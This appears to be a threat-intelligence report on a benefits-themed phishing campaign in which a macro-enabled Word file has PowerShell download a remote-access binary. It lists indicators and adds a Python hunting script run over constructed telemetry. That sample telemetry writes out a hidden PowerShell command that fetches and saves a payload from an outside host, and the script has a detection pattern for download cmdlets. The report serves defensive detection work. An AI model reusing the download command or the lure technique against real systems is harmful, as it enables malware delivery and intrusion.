Benefits Enrollment Email Used to Deliver Remote Access Payload
ID: 3f32d696-619f-4600-9786-c73c7dcc3b9c
STIX ID: report--3f32d696-619f-4600-9786-c73c7dcc3b9c
Threat Score
70/100
On 7 April 2026 a phishing campaign sent from benefits@employee-enrollmentcenter.com used a benefits-enrollment lure with a macro-enabled Word attachment, Benefits_Enrollment_2026.docm. When the recipient enabled macros, the document launched PowerShell to fetch http://159.65.201.14/files/client.bin and save it locally as benefits_client.exe. The binary installed a Windows service named "Benefits Sync Service" for persistence and began beaconing to a /api/status URI.

Observed IOCs: sender address benefits@employee-enrollmentcenter.com; attachment name Benefits_Enrollment_2026.docm; download host 159.65.201.14 and URL http://159.65.201.14/files/client.bin; dropped file name benefits_client.exe; service name "Benefits Sync Service"; beacon URI /api/status. The /api/status path is generic on its own and should be matched together with the destination host rather than used as a stand-alone indicator.
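The following hunt script is an added example and is not part of the original report. It checks the report's indicators and the Office -> PowerShell -> service-install chain against a few constructed telemetry records (not real logs). The event schema (dicts with a type field and the named keys), the assumption that the /api/status beacon goes to the download host 159.65.201.14, and the list of PowerShell download cmdlets are all assumptions to adapt to your own SIEM or EDR fields.

```python
# Added example (not from the report): hunting the report's IOCs and the
# Office -> PowerShell -> service-install chain across constructed telemetry.
# The event schema below is an assumption; map the keys to your own SIEM fields.
import re
from urllib.parse import urlparse

# Indicators taken directly from the report (lower-cased for comparison)
IOC_SENDER = "benefits@employee-enrollmentcenter.com"
IOC_ATTACHMENT = "benefits_enrollment_2026.docm"
IOC_HOST = "159.65.201.14"
IOC_DOWNLOAD_PATH = "/files/client.bin"
IOC_DROPPED_BINARY = "benefits_client.exe"
IOC_SERVICE_NAME = "benefits sync service"
IOC_BEACON_URI = "/api/status"

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Common PowerShell download primitives (assumed list, extend as needed)
DOWNLOAD_CMDLETS = re.compile(
    r"(invoke-webrequest|downloadfile|downloadstring|iwr\b|curl\b|wget\b|start-bitstransfer)",
    re.I,
)


def _base(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def check_event(ev):
    """Return a list of (severity, reason) findings for one event, [] if clean."""
    findings = []
    t = ev.get("type")
    if t == "email":
        if ev.get("sender", "").lower() == IOC_SENDER:
            findings.append(("high", "sender matches report IOC"))
        for name in ev.get("attachments", []):
            if name.lower() == IOC_ATTACHMENT:
                findings.append(("high", "attachment matches report IOC"))
            elif name.lower().endswith(".docm"):
                findings.append(("low", "macro-enabled Word attachment"))
    elif t == "process":
        img, parent = _base(ev.get("image", "")), _base(ev.get("parent_image", ""))
        cmd = ev.get("command_line", "")
        # Behavioural check: Office spawning PowerShell, worse if it downloads
        if parent in OFFICE_PARENTS and img in {"powershell.exe", "pwsh.exe"}:
            sev = "high" if DOWNLOAD_CMDLETS.search(cmd) else "medium"
            findings.append((sev, f"{parent} spawned {img}"))
        if IOC_HOST in cmd:
            findings.append(("high", "command line references download host IOC"))
        if img == IOC_DROPPED_BINARY:
            findings.append(("high", "dropped binary name matches report IOC"))
    elif t == "service_install":  # e.g. System log event 7045
        if ev.get("service_name", "").lower() == IOC_SERVICE_NAME:
            findings.append(("high", "service name matches report IOC"))
        if _base(ev.get("image_path", "")) == IOC_DROPPED_BINARY:
            findings.append(("high", "service binary matches report IOC"))
    elif t == "http":
        u = urlparse(ev.get("url", ""))
        # /api/status alone is a generic path; only flag it with the C2 host
        if u.hostname == IOC_HOST:
            if u.path == IOC_DOWNLOAD_PATH:
                findings.append(("high", "payload download URL matches report IOC"))
            elif u.path == IOC_BEACON_URI:
                findings.append(("high", "beacon URI to report C2 host"))
            else:
                findings.append(("medium", "traffic to report C2 host"))
    return findings


def hunt(events):
    """Return {event_index: findings} for every event with at least one finding."""
    out = {}
    for i, ev in enumerate(events):
        f = check_event(ev)
        if f:
            out[i] = f
    return out


# Constructed sample telemetry (not real logs) mirroring the chain in the report
SAMPLE_EVENTS = [
    {"type": "email", "sender": "benefits@employee-enrollmentcenter.com",
     "attachments": ["Benefits_Enrollment_2026.docm"]},
    {"type": "process",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -nop -w hidden -c \"Invoke-WebRequest "
                     "http://159.65.201.14/files/client.bin -OutFile "
                     "$env:TEMP\\benefits_client.exe\""},
    {"type": "http", "url": "http://159.65.201.14/files/client.bin"},
    {"type": "service_install", "service_name": "Benefits Sync Service",
     "image_path": r"C:\Users\Public\benefits_client.exe"},
    {"type": "http", "url": "http://159.65.201.14/api/status"},
    {"type": "http", "url": "https://intranet.example/api/status"},  # benign: generic path
    {"type": "process", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell Get-Date"},  # benign: not Office-spawned
]

if __name__ == "__main__":
    for idx, findings in hunt(SAMPLE_EVENTS).items():
        for sev, reason in findings:
            print(f"event {idx}: [{sev}] {reason}")
```

The behavioural rule (an Office parent spawning PowerShell with a download cmdlet) is what survives when the attacker rotates the sender domain, file name and host; the exact-match IOCs are there for retroactive sweeps of mail, proxy and System event logs covering 7 April 2026.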
